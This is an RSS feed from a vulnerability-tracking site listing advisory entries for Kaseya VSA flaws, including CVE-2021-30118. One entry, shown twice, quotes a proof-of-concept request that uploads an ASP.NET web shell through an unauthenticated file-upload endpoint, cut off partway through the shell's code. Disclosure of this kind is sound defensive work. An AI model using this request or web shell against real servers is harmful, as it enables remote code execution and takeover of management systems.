<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Mon, 05 Oct 2026 10:43:04 +0000</lastBuildDate>
    <item>
      <title>certfr-2021-avi-514 — De multiples vulnérabilités ont été découvertes dans Kaseya VSA. Elles
permettent à un attaquant de provoquer un contou…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2021-avi-514</link>
      <description>certfr-2021-avi-514</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2021-avi-514</guid>
    </item>
    <item>
      <title>cnvd-2021-50175</title>
      <link>https://cve.radiocsirt.org/vuln/cnvd-2021-50175</link>
      <description>cnvd-2021-50175</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cnvd-2021-50175</guid>
    </item>
    <item>
      <title>EUVD-2026-26636</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-26636</link>
      <description>EUVD-2026-26636</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-26636</guid>
    </item>
    <item>
      <title>fkie_cve-2021-30118</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2021-30118</link>
      <description>&lt;p&gt;An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp;amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &amp;lt;%@ Page Language=&amp;#34;C#&amp;#34; Debug=&amp;#34;true&amp;#34; validateRequest=&amp;#34;false&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Web.UI.WebControls&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Diagnostics&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.IO&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data.SqlClient&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.AccessControl&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.Principal&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections.Generic&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections&amp;#34; %&amp;gt; &amp;lt;script runat=&amp;#34;server&amp;#34;&amp;gt; private const string password = &amp;#34;pass&amp;#34;; // The password ( pass ) private const string style = &amp;#34;dark&amp;#34;; // The style ( light / dark ) prot…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp;amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &amp;lt;%@ Page Language=&amp;#34;C#&amp;#34; Debug=&amp;#34;true&amp;#34; validateRequest=&amp;#34;false&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Web.UI.WebControls&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Diagnostics&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.IO&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data.SqlClient&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.AccessControl&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.Principal&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections.Generic&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections&amp;#34; %&amp;gt; &amp;lt;script runat=&amp;#34;server&amp;#34;&amp;gt; private const string password = &amp;#34;pass&amp;#34;; // The password ( pass ) private const string style = &amp;#34;dark&amp;#34;; // The style ( light / dark ) prot…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2021-30118</guid>
    </item>
    <item>
      <title>GHSA-9xr3-46q4-vwhg</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-9xr3-46q4-vwhg</link>
      <description>&lt;p&gt;Kaseya VSA before 9.5.5 allows remote code execution.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Kaseya VSA before 9.5.5 allows remote code execution.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-9xr3-46q4-vwhg</guid>
    </item>
    <item>
      <title>gsd-2021-30118</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2021-30118</link>
      <description>gsd-2021-30118</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2021-30118</guid>
    </item>
  </channel>
</rss>
